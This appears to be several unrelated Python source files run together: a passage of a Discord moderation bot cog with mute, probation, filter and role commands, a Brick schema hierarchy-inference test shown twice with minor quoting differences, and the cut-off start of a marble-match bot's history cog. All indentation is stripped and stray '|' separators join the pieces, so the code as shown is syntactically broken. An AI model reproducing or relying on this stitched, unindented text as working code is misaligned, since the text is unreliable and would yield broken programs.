"""Removes elsewhere access from a user. Staff only."""
try:
if not await crud.add_permanent_role(member.id, self.bot.roles['No-elsewhere'].id):
return await ctx.send("This user is already restricted from elsewhere!")
await member.add_roles(self.bot.roles['No-elsewhere'])
await member.remove_roles(self.bot.roles['#elsewhere'])
await ctx.send(f"{member.mention} can no longer access elsewhere.")
msg = f"🚫 **Removed elsewhere**: {ctx.author.mention} removed elsewhere access from {member.mention} | {self.bot.escape_text(member)}"
signature = utils.command_signature(ctx.command)
if reason != "":
msg += "\n✏️ __Reason__: " + reason
else:
msg += f"\nPlease add an explanation below. In the future, it is recommended to use `{signature}` as the reason is automatically sent to the user."
await self.bot.channels['mod-logs'].send(msg)
except discord.errors.Forbidden:
await ctx.send("💢 I don't have permission to do this.")
@is_staff("HalfOP")
@commands.guild_only()
@commands.command()
async def noembed(self, ctx, member: discord.Member, *, reason=""):
"""Removes embed permissions from a user. Staff only."""
if await check_bot_or_staff(ctx, member, "noembed"):
return
try:
await crud.add_permanent_role(member.id, self.bot.roles['No-Embed'].id)
await member.add_roles(self.bot.roles['No-Embed'])
msg_user = "You lost embed and upload permissions!"
if reason != "":
msg_user += " The given reason is: " + reason
msg_user += "\n\nIf you feel this was unjustified, you may appeal in <#270890866820775946>."
await utils.send_dm_message(member, msg_user, ctx)
await ctx.send(f"{member.mention} can no longer embed links or attach files.")
msg = f"🚫 **Removed Embed**: {ctx.author.mention} removed embed from {member.mention} | {self.bot.escape_text(member)}"
signature = utils.command_signature(ctx.command)
if reason != "":
msg += "\n✏️ __Reason__: " + reason
else:
msg += f"\nPlease add an explanation below. In the future, it is recommended to use `{signature}` as the reason is automatically sent to the user."
await self.bot.channels['mod-logs'].send(msg)
except discord.errors.Forbidden:
await ctx.send("💢 I don't have permission to do this.")
@is_staff("HalfOP")
@commands.guild_only()
@commands.command()
async def embed(self, ctx, member: discord.Member):
"""Restore embed permissions for a user. Staff only."""
try:
await crud.remove_permanent_role(member.id, self.bot.roles["No-Embed"].id)
await member.remove_roles(self.bot.roles['No-Embed'])
await ctx.send(f"{member.mention} can now embed links and attach files again.")
msg = f"⭕️ **Restored Embed**: {ctx.author.mention} restored embed to {member.mention} | {self.bot.escape_text(member)}"
await self.bot.channels['mod-logs'].send(msg)
except discord.errors.Forbidden:
await ctx.send("💢 I don't have permission to do this.")
@is_staff("Helper")
@commands.guild_only()
@commands.command(aliases=["nohelp", "yesnthelp"])
async def takehelp(self, ctx, member: Union[discord.Member, discord.User], *, reason=""):
"""Remove access to the assistance channels. Staff and Helpers only."""
if await check_bot_or_staff(ctx, member, "takehelp"):
return
if not await crud.add_permanent_role(member.id, self.bot.roles['No-Help'].id):
# Check if the user has a timed restriction.
# If there is one, this will convert it to a permanent one.
# If not, it will display that it was already taken.
if not await crud.get_time_restrictions_by_user_type(member.id, 'timenohelp'):
return await ctx.send("This user's help is already taken!")
else:
await crud.remove_timed_restriction(member.id, 'timenohelp')
msg_user = "You lost access to help channels!"
if isinstance(member, discord.Member):
await member.add_roles(self.bot.roles['No-Help'])
if reason != "":
msg_user += " The given reason is: " + reason
msg_user += "\n\nIf you feel this was unjustified, you may appeal in <#270890866820775946>."
await utils.send_dm_message(member, msg_user, ctx)
await ctx.send(f"{member.mention} can no longer access the help channels.")
msg = f"🚫 **Help access removed**: {ctx.author.mention} removed access to help channels from {member.mention} | {self.bot.escape_text(member)}"
signature = utils.command_signature(ctx.command)
if reason != "":
msg += "\n✏️ __Reason__: " + reason
else:
msg += f"\nPlease add an explanation below. In the future, it is recommended to use `{signature}` as the reason is automatically sent to the user."
await self.bot.channels['mod-logs'].send(msg)
@is_staff("Helper")
@commands.guild_only()
@commands.command(aliases=["yeshelp"])
async def givehelp(self, ctx, member: Union[discord.Member, discord.User]):
"""Restore access to the assistance channels. Staff and Helpers only."""
if not await crud.remove_permanent_role(member.id, self.bot.roles["No-Help"].id):
return await ctx.send("This user is not take-helped!")
if isinstance(member, discord.Member):
try:
await member.remove_roles(self.bot.roles['No-Help'])
except discord.errors.Forbidden:
await ctx.send("💢 I don't have permission to do this.")
await ctx.send(f"{member.mention} can access the help channels again.")
msg = f"⭕️ **Help access restored**: {ctx.author.mention} restored access to help channels to {member.mention} | {self.bot.escape_text(member)}"
await self.bot.channels['mod-logs'].send(msg)
await crud.remove_timed_restriction(member.id, 'timenohelp')
@is_staff("Helper")
@commands.guild_only()
@commands.command(aliases=["timenohelp"])
async def timetakehelp(self, ctx, member: discord.Member, length, *, reason=""):
"""Restricts a user from Assistance Channels for a limited period of time. Staff and Helpers only.\n\nLength format: #d#h#m#s"""
if await check_bot_or_staff(ctx, member, "takehelp"):
return
issuer = ctx.author
if (seconds := utils.parse_time(length)) == -1:
return await ctx.send("💢 I don't understand your time format.")
delta = datetime.timedelta(seconds=seconds)
timestamp = datetime.datetime.now()
unnohelp_time = timestamp + delta
unnohelp_time_string = unnohelp_time.strftime("%Y-%m-%d %H:%M:%S")
await crud.add_timed_restriction(member.id, unnohelp_time, 'timenohelp')
await crud.add_permanent_role(member.id, self.bot.roles['No-Help'].id)
await member.add_roles(self.bot.roles['No-Help'])
msg_user = "You lost access to help channels temporarily!"
if reason != "":
msg_user += " The given reason is: " + reason
msg_user += "\n\nIf you feel this was unjustified, you may appeal in <#270890866820775946>."
msg_user += f"\n\nThis restriction expires {unnohelp_time_string} {time.tzname[0]}."
await utils.send_dm_message(member, msg_user, ctx)
await ctx.send(f"{member.mention} can no longer speak in Assistance Channels.")
signature = utils.command_signature(ctx.command)
msg = f"🚫 **Timed No-Help**: {issuer.mention} restricted {member.mention} for {delta}, until {unnohelp_time_string} | {self.bot.escape_text(member)}"
if reason != "":
msg += "\n✏️ __Reason__: " + reason
else:
msg += f"\nPlease add an explanation below. In the future, it is recommended to use `{signature}` as the reason is automatically sent to the user."
await self.bot.channels['mod-logs'].send(msg)
@is_staff("Helper")
@commands.guild_only()
@commands.command(aliases=["notech", "technt"])
async def taketech(self, ctx, member: Union[discord.Member, discord.User], *, reason=""):
"""Remove access to the tech channel. Staff and Helpers only."""
if await check_bot_or_staff(ctx, member, "taketech"):
return
if not await crud.add_permanent_role(member.id, self.bot.roles['No-Tech'].id):
# Check if the user has a timed restriction.
# If there is one, this will convert it to a permanent one.
# If not, it will display that it was already taken.
if not await crud.get_time_restrictions_by_user_type(member.id, 'timenotech'):
return await ctx.send("This user's tech is already taken!")
else:
await crud.remove_timed_restriction(member.id, 'timenotech')
msg_user = "You lost access to the tech channel!"
if isinstance(member, discord.Member):
await member.add_roles(self.bot.roles['No-Tech'])
if reason != "":
msg_user += " The given reason is: " + reason
msg_user += "\n\nIf you feel this was unjustified, you may appeal in <#270890866820775946>."
await utils.send_dm_message(member, msg_user, ctx)
await ctx.send(f"{member.mention} can no longer access the tech channel.")
msg = f"🚫 **Help access removed**: {ctx.author.mention} removed access to tech channel from {member.mention} | {self.bot.escape_text(member)}"
signature = utils.command_signature(ctx.command)
if reason != "":
msg += "\n✏️ __Reason__: " + reason
else:
msg += f"\nPlease add an explanation below. In the future, it is recommended to use `{signature}` as the reason is automatically sent to the user."
await self.bot.channels['mod-logs'].send(msg)
@is_staff("Helper")
@commands.guild_only()
@commands.command(aliases=["yestech"])
async def givetech(self, ctx, member: Union[discord.Member, discord.User]):
"""Restore access to the tech channel. Staff and Helpers only."""
if not await crud.remove_permanent_role(member.id, self.bot.roles["No-Tech"].id):
return await ctx.send("This user is not take-helped!")
if isinstance(member, discord.Member):
try:
await member.remove_roles(self.bot.roles['No-Tech'])
except discord.errors.Forbidden:
await ctx.send("💢 I don't have permission to do this.")
await ctx.send(f"{member.mention} can access the tech channel again.")
msg = f"⭕️ **Help access restored**: {ctx.author.mention} restored access to tech channel to {member.mention} | {self.bot.escape_text(member)}"
await self.bot.channels['mod-logs'].send(msg)
await crud.remove_timed_restriction(member.id, 'timenotech')
@is_staff("Helper")
@commands.guild_only()
@commands.command(aliases=["timenotech"])
async def timetaketech(self, ctx, member: discord.Member, length, *, reason=""):
"""Restricts a user from the tech channel for a limited period of time. Staff and Helpers only.\n\nLength format: #d#h#m#s"""
if await check_bot_or_staff(ctx, member, "taketech"):
return
issuer = ctx.author
if (seconds := utils.parse_time(length)) == -1:
return await ctx.send("💢 I don't understand your time format.")
delta = datetime.timedelta(seconds=seconds)
timestamp = datetime.datetime.now()
unnotech_time = timestamp + delta
unnotech_time_string = unnotech_time.strftime("%Y-%m-%d %H:%M:%S")
await crud.add_timed_restriction(member.id, unnotech_time, 'timenotech')
await crud.add_permanent_role(member.id, self.bot.roles['No-Tech'].id)
await member.add_roles(self.bot.roles['No-Tech'])
msg_user = "You lost access to the tech channel temporarily!"
if reason != "":
msg_user += " The given reason is: " + reason
msg_user += "\n\nIf you feel this was unjustified, you may appeal in <#270890866820775946>."
msg_user += f"\n\nThis restriction expires {unnotech_time_string} {time.tzname[0]}."
await utils.send_dm_message(member, msg_user, ctx)
await ctx.send(f"{member.mention} can no longer speak in the tech channel.")
signature = utils.command_signature(ctx.command)
msg = f"🚫 **Timed No-Tech**: {issuer.mention} restricted {member.mention} for {delta}, until {unnotech_time_string} | {self.bot.escape_text(member)}"
if reason != "":
msg += "\n✏️ __Reason__: " + reason
else:
msg += f"\nPlease add an explanation below. In the future, it is recommended to use `{signature}` as the reason is automatically sent to the user."
await self.bot.channels['mod-logs'].send(msg)
@is_staff("Helper")
@commands.guild_only()
@commands.command(aliases=["mutehelp"])
async def helpmute(self, ctx, member: Union[discord.Member, discord.User], *, reason=""):
"""Remove speak perms to the assistance channels. Staff and Helpers only."""
if await check_bot_or_staff(ctx, member, "helpmute"):
return
if not await crud.add_permanent_role(member.id, self.bot.roles['help-mute'].id):
if not await crud.get_time_restrictions_by_user_type(member.id, 'timehelpmute'):
return await ctx.send("This user is already helpmuted!")
else:
await crud.remove_timed_restriction(member.id, 'timehelpmute')
msg_user = "You muted in the help channels!"
if isinstance(member, discord.Member):
await member.add_roles(self.bot.roles['help-mute'])
if reason != "":
msg_user += " The given reason is: " + reason
msg_user += "\n\nIf you feel this was unjustified, you may appeal in <#270890866820775946>."
await utils.send_dm_message(member, msg_user, ctx)
await ctx.send(f"{member.mention} can no longer speak in the help channels.")
msg = f"🚫 **Help mute**: {ctx.author.mention} removed speak access in help channels from {member.mention} | {self.bot.escape_text(member)}"
signature = utils.command_signature(ctx.command)
if reason != "":
msg += "\n✏️ __Reason__: " + reason
else:
msg += f"\nPlease add an explanation below. In the future, it is recommended to use `{signature}` as the reason is automatically sent to the user."
await self.bot.channels['mod-logs'].send(msg)
@is_staff("Helper")
@commands.guild_only()
@commands.command(aliases=["timemutehelp"])
async def timehelpmute(self, ctx, member: discord.Member, length, *, reason=""):
"""Restricts a user from speaking in Assistance Channels for a limited period of time. Staff and Helpers only.\n\nLength format: #d#h#m#s"""
if await check_bot_or_staff(ctx, member, "helpmute"):
return
issuer = ctx.author
if (seconds := utils.parse_time(length)) == -1:
return await ctx.send("💢 I don't understand your time format.")
delta = datetime.timedelta(seconds=seconds)
timestamp = datetime.datetime.now()
unhelpmute_time = timestamp + delta
unhelpmute_time_string = unhelpmute_time.strftime("%Y-%m-%d %H:%M:%S")
await crud.add_timed_restriction(member.id, unhelpmute_time, 'timehelpmute')
await crud.add_permanent_role(member.id, self.bot.roles['help-mute'].id)
await member.add_roles(self.bot.roles['help-mute'])
msg_user = "You lost send access to help channels temporarily!"
if reason != "":
msg_user += " The given reason is: " + reason
msg_user += "\n\nIf you feel this was unjustified, you may appeal in <#270890866820775946>."
msg_user += f"\n\nThis restriction expires {unhelpmute_time_string} {time.tzname[0]}."
await utils.send_dm_message(member, msg_user, ctx)
await ctx.send(f"{member.mention} can no longer speak in the help channels.")
signature = utils.command_signature(ctx.command)
msg = f"🚫 **Timed Help mute**: {issuer.mention} help muted {member.mention} for {delta}, until {unhelpmute_time_string} | {self.bot.escape_text(member)}"
if reason != "":
msg += "\n✏️ __Reason__: " + reason
else:
msg += f"\nPlease add an explanation below. In the future, it is recommended to use `{signature}` as the reason is automatically sent to the user."
await self.bot.channels['mod-logs'].send(msg)
@is_staff("Helper")
@commands.guild_only()
@commands.command()
async def helpunmute(self, ctx, member: Union[discord.Member, discord.User]):
"""Restores speak access to help channels. Helpers+ only."""
if not await crud.remove_permanent_role(member.id, self.bot.roles["help-mute"].id):
return await ctx.send("This user is not help muted!")
if isinstance(member, discord.Member):
try:
await member.remove_roles(self.bot.roles['help-mute'])
except discord.errors.Forbidden:
await ctx.send("💢 I don't have permission to do this.")
await crud.remove_timed_restriction(member.id, 'timehelpmute')
await ctx.send(f"{member.mention} can now speak in the help channels again.")
msg = f"⭕ **Help unmuted**: {ctx.author.mention} help unmuted {member.mention} | {self.bot.escape_text(member)}"
await self.bot.channels['mod-logs'].send(msg)
@is_staff("Helper")
@commands.guild_only()
@commands.command()
async def takesmallhelp(self, ctx, members: commands.Greedy[discord.Member]):
"""Remove access to small help channel. Staff and Helpers only."""
if len(members) < 1:
await ctx.send("Mention at least one user")
return
for member in members:
await member.remove_roles(self.bot.roles['Small Help'])
await ctx.send(f"{', '.join([x.mention for x in members])} can no longer access the small help channel.")
msg = f"⭕️ **Small help access revoked**: {ctx.author.mention} revoked access to small help channel from {', '.join([f'{x.mention} | {x}'for x in members])}"
await self.bot.channels['mod-logs'].send(msg)
@is_staff("Helper")
@commands.guild_only()
@commands.command()
async def givesmallhelp(self, ctx, members: commands.Greedy[discord.Member]):
"""Provide access to small help channel for 1-on-1 help. Staff and Helpers only."""
if len(members) < 1:
await ctx.send("Mention at least one user")
return
for member in members:
await member.add_roles(self.bot.roles['Small Help'])
await ctx.send(f"{', '.join([x.mention for x in members])} can access the small help channel.")
msg = f"⭕️ **Small help access granted**: {ctx.author.mention} granted access to small help channel to {', '.join([f'{x.mention} | {x}'for x in members])}"
await self.bot.channels['mod-logs'].send(msg)
@is_staff("Helper")
@commands.guild_only()
@commands.command()
async def probate(self, ctx, member: Union[discord.Member, discord.User], *, reason=""):
"""Probate a user. Staff and Helpers only."""
if await check_bot_or_staff(ctx, member, "probate"):
return
if not await crud.add_permanent_role(member.id, self.bot.roles['Probation'].id):
return await ctx.send("This user is already probated!")
if isinstance(member, discord.Member):
await member.add_roles(self.bot.roles['Probation'])
msg_user = "You are under probation!"
if reason != "":
msg_user += " The given reason is: " + reason
await utils.send_dm_message(member, msg_user, ctx)
await ctx.send(f"{member.mention} is now in probation.")
msg = f"🚫 **Probated**: {ctx.author.mention} probated {member.mention} | {self.bot.escape_text(member)}"
signature = utils.command_signature(ctx.command)
if reason != "":
msg += "\n✏️ __Reason__: " + reason
else:
msg += f"\nPlease add an explanation below. In the future, it is recommended to use `{signature}` as the reason is automatically sent to the user."
await self.bot.channels['mod-logs'].send(msg)
@is_staff("Helper")
@commands.guild_only()
@commands.command()
async def unprobate(self, ctx, member: Union[discord.Member, discord.User]):
"""Unprobate a user. Staff and Helpers only."""
if not await crud.remove_permanent_role(member.id, self.bot.roles["Probation"].id) and self.bot.roles["Probation"] not in member.roles:
return await ctx.send("This user is not probated!")
if isinstance(member, discord.Member):
await member.remove_roles(self.bot.roles['Probation'])
await ctx.send(f"{member.mention} is out of probation.")
msg = f"⭕️ **Un-probated**: {ctx.author.mention} un-probated {member.mention} | {self.bot.escape_text(member)}"
await self.bot.channels['mod-logs'].send(msg)
@is_staff("Owner")
@commands.guild_only()
@commands.command()
async def updatechannel(self, ctx, name, channel: discord.TextChannel):
"""Changes the id of a channel"""
if name not in self.bot.channels:
await ctx.send("Invalid channel name!")
return
await models.Channel.update.values(id=channel.id).where(models.Channel.name == name).gino.status()
self.bot.channels[name] = channel
await ctx.send(f"Changed {name} channel to {channel.mention} | {channel.id}")
await self.bot.channels['server-logs'].send(f"⚙ **Changed**: {ctx.author.mention} changed {name} channel to {channel.mention} | {channel.id}")
@is_staff("Owner")
@commands.guild_only()
@commands.command()
async def setmodchannel(self, ctx, channel: discord.TextChannel, value: bool):
"""Changes the mod flag of a channel"""
dbchannel = await crud.get_dbchannel(channel.id)
await dbchannel.update(mod_channel=value).apply()
await ctx.send(f"{channel.mention} is {'now' if value else 'no longer'} a mod channel.")
@is_staff("OP")
@commands.command()
async def playing(self, ctx, *, gamename):
"""Sets playing message. Staff only."""
await self.bot.change_presence(activity=discord.Game(name=gamename))
@is_staff("OP")
@commands.command()
async def status(self, ctx, status):
"""Sets status. Staff only."""
if status == "online":
await self.bot.change_presence(status=discord.Status.online)
elif status == "offline":
await self.bot.change_presence(status=discord.Status.offline)
elif status == "idle":
await self.bot.change_presence(status=discord.Status.idle)
elif status == "dnd":
await self.bot.change_presence(status=discord.Status.dnd)
elif status == "invisible":
await self.bot.change_presence(status=discord.Status.invisible)
@is_staff("OP")
@commands.command()
async def username(self, ctx, *, username):
"""Sets bot name. Staff only."""
await self.bot.user.edit(username=username)
@is_staff("SuperOP")
@commands.guild_only()
@commands.command()
async def nofilter(self, ctx, channel: discord.TextChannel):
"""Adds nofilter to the channel"""
if await crud.check_nofilter(channel):
return await ctx.send("This channel is already no filtered!")
await crud.add_nofilter(channel)
await self.bot.channels['mod-logs'].send(f"⭕ **No filter**: {ctx.author.mention} added no filter to {channel.mention}")
@is_staff("SuperOP")
@commands.guild_only()
@commands.command()
async def filter(self, ctx, channel: discord.TextChannel):
"""Removes nofilter from the channel"""
if not await crud.check_nofilter(channel):
return await ctx.send("This channel is already filtered!")
await crud.remove_nofilter(channel)
await self.bot.channels['mod-logs'].send(f"🚫 **Filter**: {ctx.author.mention} removed no filter from {channel.mention}")
@is_staff("Helper")
@commands.guild_only()
@commands.command()
async def approve(self, ctx, alias: str, invite: discord.Invite, times: int = 1):
"""Approves a server invite for a number of times. Staff and Helpers only."""
code = invite.code
if await self.bot.invitefilter.fetch_invite_by_alias(alias) or await self.bot.invitefilter.fetch_invite_by_code(code):
return await ctx.send("This code or alias is already in use!")
if times < 1:
return await ctx.send("The invite must be approved for a number of times higher than 0")
await self.bot.invitefilter.add(code=code, alias=alias, uses=times)
await ctx.send(f"Approved an invite to {invite.guild}({code}) for posting {times} times")
await self.bot.channels['mod-logs'].send(f"⭕ **Approved**: {ctx.author.mention} approved server {invite.guild}({code}) to be posted {times} times")
@is_staff("SuperOP")
@commands.command(aliases=['setrole', 'scr'])
async def setchannelrole(self, ctx, channel: discord.TextChannel, role: discord.Role):
"""Sets the default role of a channel."""
dbchannel = await models.Channel.get(channel.id)
if not dbchannel:
dbchannel = await crud.add_dbchannel(channel.id, channel.name)
if not await models.Role.get(role.id):
await crud.add_dbrole(role.id, role.name)
await dbchannel.update(default_role=role.id).apply()
await ctx.send("Parameter updated succesfully")
@is_staff("Helper")
@commands.command(aliases=['ci'])
async def channelinfo(self, ctx, channel: discord.TextChannel = None):
"""Shows database information about a text channel."""
state = {0: "Not locked", 1: "softlocked", 2: "locked", 3: "super locked"}
if not channel:
channel = ctx.channel
dbchannel = await models.Channel.get(channel.id)
if not dbchannel:
return await ctx.send("This channel is not in the database")
role = await crud.get_dbrole(dbchannel.default_role) if dbchannel.default_role else ctx.guild.default_role
embed = discord.Embed(title=dbchannel.name)
embed.add_field(name="ID", value=dbchannel.id, inline=False)
embed.add_field(name="Default Role", value=role.name, inline=False)
embed.add_field(name="Filtered", value=str(not dbchannel.nofilter), inline=False)
embed.add_field(name="Status", value=state[dbchannel.lock_level], inline=False)
await ctx.send(embed=embed)
@is_staff("OP")
@commands.bot_has_permissions(manage_roles=True)
@commands.guild_only()
@commands.command()
async def tempstream(self, ctx, member: discord.Member, length: str = ""):
"""Gives temporary streaming permissions to a member. Lasts 24 hours by default"""
await member.add_roles(self.bot.roles['streamer(temp)'])
timestamp = datetime.datetime.now()
seconds = utils.parse_time(length) if length else 86400
if seconds == -1:
return await ctx.send("💢 I don't understand your time format.")
delta = datetime.timedelta(seconds=seconds)
expiring_time = timestamp + delta
expiring_time_string = expiring_time.strftime("%Y-%m-%d %H:%M:%S")
await crud.add_timed_role(member.id, self.bot.roles['streamer(temp)'].id, expiring_time)
msg_user = f"You have been given streaming permissions until {expiring_time_string}!"
await utils.send_dm_message(member, msg_user, ctx)
await ctx.send(f"{member.mention} has been given streaming permissions until {expiring_time_string}.")
await self.bot.channels['mod-logs'].send(f"⭕ **Permission Granted**: {ctx.author.mention} granted streaming permissions to {member.mention} until {expiring_time_string}")
@is_staff("OP")
@commands.bot_has_permissions(manage_roles=True)
@commands.guild_only()
@commands.command()
async def notempstream(self, ctx, member: discord.Member):
"""Revokes temporary streaming permissions from a member."""
await member.remove_roles(self.bot.roles['streamer(temp)'])
await crud.remove_timed_role(member.id, self.bot.roles['streamer(temp)'].id)
msg_user = "Your temporary streaming permissions have been revoked!"
await utils.send_dm_message(member, msg_user, ctx)
await self.bot.channels['mod-logs'].send(f"⭕ **Permission Revoked**: {ctx.author.mention} revoked {member.mention} streaming permissions.")
def setup(bot):
bot.add_cog(Mod(bot))
|
import json
from collections import defaultdict
import time
import brickschema
from tqdm import tqdm
from rdflib import URIRef, Graph
from .util import make_readable
import sys
sys.path.append("..")
from bricksrc.version import BRICK_VERSION # noqa: E402
from bricksrc.namespaces import BRICK # noqa: E402
"""
This script does the following:
(1) Create entities that are supposed to be instances of Classes. (Class == ``brick:Class``)
(2) Associate the entities with Tags defined for each Class.
(3) Infer each entity's classes (throughout the hierarchy) based only on its Tags.
If the schema is correctly designe, the following properties should be met
[1] Each of the entities should be an instance of the target Class defined in (2).
[2] Each of the entities should be instances of all the parent Classes of the target Class but nothing else. This is basically a super set of [1].
This test is a superset of ``test_inference.py``.
"""
inference_file = "tests/test_hierarchy_inference.ttl"
entity_postfix = "_0"
q_prefix = f"""
prefix brick: <https://brickschema.org/schema/{BRICK_VERSION}/Brick#>
prefix owl: <http://www.w3.org/2002/07/owl#>
"""
def test_hierarchyinference():
# Load the schema
g = Graph()
g.parse("Brick.ttl", format="turtle")
# Get all the Classes with their restrictions.
qstr = (
q_prefix
+ """
select ?class ?tag where {
?class rdfs:subClassOf+ brick:Class.
?class brick:hasAssociatedTag ?tag
}
"""
)
start_time = time.time()
for row in tqdm(g.query(qstr)):
klass = row[0]
entity = klass + entity_postfix # Define an entity for the class
g.add(
(entity, BRICK.hasTag, row[1])
) # Associate the entity with restrictions (i.e., Tags)
end_time = time.time()
print("Instantiation took {0} seconds".format(int(end_time - start_time)))
# Infer classes of the entities.
# Apply reasoner
g.serialize("test.ttl", format="ttl")
g = brickschema.inference.TagInferenceSession(
approximate=False, load_brick=False
).expand(g)
g = brickschema.inference.OWLRLInferenceSession(load_brick=False).expand(g)
g.serialize(inference_file, format="turtle") # Store the inferred graph.
# Find all instances and their parents from the inferred graph.
qstr = (
q_prefix
+ """
select ?instance ?class where {
?instance a ?class.
?class rdfs:subClassOf* brick:Class.
}
"""
)
inferred_klasses = defaultdict(set)
for row in tqdm(g.query(qstr)):
entity = row[0]
klass = row[1]
if BRICK in klass: # Filter out non-Brick classes such as Restrictions
inferred_klasses[entity].add(klass)
# get equivalent classes
equivalent_classes = defaultdict(set)
res = g.query(
q_prefix
+ """\nSELECT ?c1 ?c2 WHERE {
?c1 owl:equivalentClass ?c2
}"""
)
for (c1, c2) in res:
equivalent_classes[c1].add(c2)
equivalent_classes[c2].add(c1)
over_inferences = {} # Inferred Classes that are not supposed to be inferred.
under_inferences = (
{}
) # Classes that should have been inferred but not actually inferred.
wrong_inferences = {} # Other wrongly inferred Classes.
for entity, inferred_parents in inferred_klasses.items():
if entity[-2:] != entity_postfix:
continue
true_class = URIRef(
entity[0:-2]
) # This is based on how the entity name is defined above.
# Find the original classes through the hierarchy from the original graph.
qstr = (
q_prefix
+ """
select ?parent where {{
<{0}> rdfs:subClassOf* ?parent.
?parent rdfs:subClassOf* brick:Class.
}}
""".format(
true_class
)
)
res = g.query(qstr)
true_parents = [row[0] for row in res]
for tp in true_parents[:]:
true_parents.extend(equivalent_classes.get(tp, []))
true_parents = set(filter(lambda parent: BRICK in parent, true_parents))
# TODO: bug here where this does not consider equivalent classes
serialized = {
"inferred_parents": list(inferred_parents),
"true_parents": list(true_parents),
}
if inferred_parents > true_parents:
over_inferences[entity] = serialized
diff = set(inferred_parents).difference(set(true_parents))
print(
f"Tags for {true_class.split("#")[-1]} imply extra classes: {make_readable([diff])}"
)
elif inferred_parents < true_parents:
under_inferences[entity] = serialized
diff = set(true_parents).difference(set(inferred_parents))
print(
f"Tags for {true_class.split("#")[-1]} do not imply classes, but should: {make_readable([diff])}"
)
elif inferred_parents != true_parents:
wrong_inferences[entity] = serialized
with open("tests/test_hierarchy_inference.json", "w") as fp:
json.dump(
{
"over_inferences": over_inferences,
"under_inferences": under_inferences,
"wrong_inferencers": wrong_inferences,
},
fp,
indent=2,
)
assert not over_inferences, "There are {0} classes that are over-inferred".format(
len(over_inferences)
)
assert not under_inferences, "There are {0} classes that are under-inferred".format(
len(under_inferences)
)
assert (
not wrong_inferences
), "There are {0} classes that are inferred incorrectly in other ways".format(
len(wrong_inferences)
)
| import json
from collections import defaultdict
import time
import brickschema
from tqdm import tqdm
from rdflib import URIRef, Graph
from .util import make_readable
import sys
sys.path.append("..")
from bricksrc.version import BRICK_VERSION # noqa: E402
from bricksrc.namespaces import BRICK # noqa: E402
"""
This script does the following:
(1) Create entities that are supposed to be instances of Classes. (Class == ``brick:Class``)
(2) Associate the entities with Tags defined for each Class.
(3) Infer each entity's classes (throughout the hierarchy) based only on its Tags.
If the schema is correctly designe, the following properties should be met
[1] Each of the entities should be an instance of the target Class defined in (2).
[2] Each of the entities should be instances of all the parent Classes of the target Class but nothing else. This is basically a super set of [1].
This test is a superset of ``test_inference.py``.
"""
inference_file = "tests/test_hierarchy_inference.ttl"
entity_postfix = "_0"
q_prefix = f"""
prefix brick: <https://brickschema.org/schema/{BRICK_VERSION}/Brick#>
prefix owl: <http://www.w3.org/2002/07/owl#>
"""
def test_hierarchyinference():
# Load the schema
g = Graph()
g.parse("Brick.ttl", format="turtle")
# Get all the Classes with their restrictions.
qstr = (
q_prefix
+ """
select ?class ?tag where {
?class rdfs:subClassOf+ brick:Class.
?class brick:hasAssociatedTag ?tag
}
"""
)
start_time = time.time()
for row in tqdm(g.query(qstr)):
klass = row[0]
entity = klass + entity_postfix # Define an entity for the class
g.add(
(entity, BRICK.hasTag, row[1])
) # Associate the entity with restrictions (i.e., Tags)
end_time = time.time()
print("Instantiation took {0} seconds".format(int(end_time - start_time)))
# Infer classes of the entities.
# Apply reasoner
g.serialize("test.ttl", format="ttl")
g = brickschema.inference.TagInferenceSession(
approximate=False, load_brick=False
).expand(g)
g = brickschema.inference.OWLRLInferenceSession(load_brick=False).expand(g)
g.serialize(inference_file, format="turtle") # Store the inferred graph.
# Find all instances and their parents from the inferred graph.
qstr = (
q_prefix
+ """
select ?instance ?class where {
?instance a ?class.
?class rdfs:subClassOf* brick:Class.
}
"""
)
inferred_klasses = defaultdict(set)
for row in tqdm(g.query(qstr)):
entity = row[0]
klass = row[1]
if BRICK in klass: # Filter out non-Brick classes such as Restrictions
inferred_klasses[entity].add(klass)
# get equivalent classes
equivalent_classes = defaultdict(set)
res = g.query(
q_prefix
+ """\nSELECT ?c1 ?c2 WHERE {
?c1 owl:equivalentClass ?c2
}"""
)
for (c1, c2) in res:
equivalent_classes[c1].add(c2)
equivalent_classes[c2].add(c1)
over_inferences = {} # Inferred Classes that are not supposed to be inferred.
under_inferences = (
{}
) # Classes that should have been inferred but not actually inferred.
wrong_inferences = {} # Other wrongly inferred Classes.
for entity, inferred_parents in inferred_klasses.items():
if entity[-2:] != entity_postfix:
continue
true_class = URIRef(
entity[0:-2]
) # This is based on how the entity name is defined above.
# Find the original classes through the hierarchy from the original graph.
qstr = (
q_prefix
+ """
select ?parent where {{
<{0}> rdfs:subClassOf* ?parent.
?parent rdfs:subClassOf* brick:Class.
}}
""".format(
true_class
)
)
res = g.query(qstr)
true_parents = [row[0] for row in res]
for tp in true_parents[:]:
true_parents.extend(equivalent_classes.get(tp, []))
true_parents = set(filter(lambda parent: BRICK in parent, true_parents))
# TODO: bug here where this does not consider equivalent classes
serialized = {
"inferred_parents": list(inferred_parents),
"true_parents": list(true_parents),
}
if inferred_parents > true_parents:
over_inferences[entity] = serialized
diff = set(inferred_parents).difference(set(true_parents))
print(
f"Tags for {true_class.split('#')[-1]} imply extra classes: {make_readable([diff])}"
)
elif inferred_parents < true_parents:
under_inferences[entity] = serialized
diff = set(true_parents).difference(set(inferred_parents))
print(
f"Tags for {true_class.split('#')[-1]} do not imply classes, but should: {make_readable([diff])}"
)
elif inferred_parents != true_parents:
wrong_inferences[entity] = serialized
with open("tests/test_hierarchy_inference.json", "w") as fp:
json.dump(
{
"over_inferences": over_inferences,
"under_inferences": under_inferences,
"wrong_inferencers": wrong_inferences,
},
fp,
indent=2,
)
assert not over_inferences, "There are {0} classes that are over-inferred".format(
len(over_inferences)
)
assert not under_inferences, "There are {0} classes that are under-inferred".format(
len(under_inferences)
)
assert (
not wrong_inferences
), "There are {0} classes that are inferred incorrectly in other ways".format(
len(wrong_inferences)
)
|
import asyncio
import math
import datetime
import logging
from typing import Union
import pytz
import discord
from discord.ext import commands
from database.database_setup import DbHandler
import utils.discord_utils as du
import utils.account as acc
import utils.matches as ma
import utils.bets as bets
import utils.exception as exception
logger = logging.getLogger(f'marble_match.{__name__}')
class HistoryCog(commands.Cog, name='History'):
def __init__(self, bot: commands.Bot):
self.bot = bot
@staticmethod
def utc_to_est(date: datetime.datetime):
"""Returns datetime converted from utc to est
**Arguments**
- `<date>` utc date to be converted to est
"""
date2 = date.replace(tzinfo=pytz.utc).astimezone(pytz.timezone('US/Eastern'))
return pytz.timezone('US/Eastern').normalize(date2)
def generate_match_text(self, match: ma.Match) -> str:
return_text = ''
